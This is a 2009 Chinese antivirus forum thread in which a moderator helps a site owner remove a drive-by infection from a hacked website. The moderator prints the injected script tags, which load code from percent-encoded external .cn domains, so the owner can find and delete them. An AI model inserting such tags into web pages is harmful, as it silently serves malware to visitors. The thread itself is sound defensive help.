瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 瑞星云安全网站联盟专版 » 请高手帮帮忙!(已解决)
MrZhAnGs - 2009-10-16 13:06:00
网站被挂马了  但是找不到代码。
访问地址:http://d5g5l.cn/x2/td09.htm
访问网页的进程:"C:\Program Files\Internet Explorer\iexplore.exe"
病毒名称:Suspicious.ShellCode.Exploit
请问怎么弄啊?

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; QQDownload 1.7; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.0.30618; .NET CLR 3.5.30729)
networkedition - 2009-10-16 13:06:00
网站地址呢:kaka2:
networkedition - 2009-10-16 13:12:00
Log generated by networkedition use mdecoder 0.27
[root]http://www.sqnzwx.com/
    [script]http://%35%31%33%31%34%38%2e%63%6e
    [script]http://%38%32%30%348%2e%63%6e
    [script]http://%35%31%33%31%34%38%2e%63%6e
    [script]http://%38%32%30%348%2e%63%6e
    [script]http://www.sqnzwx.com/images/global.js
    [script]http://www.sqnzwx.com/article_index.asp?classid=2&includechild=true&showtype=1&articlenum=6&showtitle=true&titlemaxlen=38
    [script]http://www.sqnzwx.com/article_index.asp?classid=3&includechild=true&showtype=1&articlenum=6&showtitle=true&titlemaxlen=38
    [script]http://www.sqnzwx.com/article_index.asp?classid=4&includechild=true&showtype=1&articlenum=6&showtitle=true&titlemaxlen=38
    [script]http://www.sqnzwx.com/article_index.asp?classid=5&includechild=true&showtype=1&articlenum=6&showtitle=true&titlemaxlen=38
    [script]http://www.sqnzwx.com/article_index.asp?classid=6&includechild=true&showtype=1&articlenum=6&showtitle=true&titlemaxlen=38
    [script]http://www.sqnzwx.com/article_index.asp?classid=7&includechild=true&showtype=1&articlenum=6&showtitle=true&titlemaxlen=38
    [script]http://%35%31%33%31%34%38%2e%63%6e
    [script]http://%38%32%30%348%2e%63%6e
MrZhAnGs - 2009-10-16 13:13:00
http://www.sqnzwx.com:kaka2:
networkedition - 2009-10-16 13:14:00
看3楼的回复
MrZhAnGs - 2009-10-16 13:16:00
怎么清除啊?不太会、谢谢了、
networkedition - 2009-10-16 13:19:00
所挂恶意链接地址内容如下,在网站源代码的首部:
<script src=http://%35%31%33%31%34%38%2E%63%6E></script><script src=http://%38%32%30%348%2E%63%6E></script><script src=http://%35%31%33%31%34%38%2E%63%6E></script><script src=http://%38%32%30%348%2E%63%6E></script>
页面底部如下:
<script src=http://%35%31%33%31%34%38%2E%63%6E></script><script src=http://%38%32%30%348%2E%63%6E></script>
在网站源代码中找到将其删除,建议删除前做好备份工作。
MrZhAnGs - 2009-10-16 13:27:00
谢谢,把首页上的代码删了,但貌似还是有。。
networkedition - 2009-10-16 13:30:00
ms你只清除了底部的,首页顶部的还在:kaka6:
MrZhAnGs - 2009-10-16 13:35:00
谢谢斑竹,太棒了!!
貌似都删掉了。
但是为什么这么卡呢?
networkedition - 2009-10-16 13:40:00
都已经清除了,我这边访问正常。:kaka9:
MrZhAnGs - 2009-10-16 13:42:00
OK!一切恢复正常。。
谢谢斑竹!:kaka18: :kaka18:
1
查看完整版本: 请高手帮帮忙!(已解决)
© 2000 - 2024 Rising Corp. Ltd.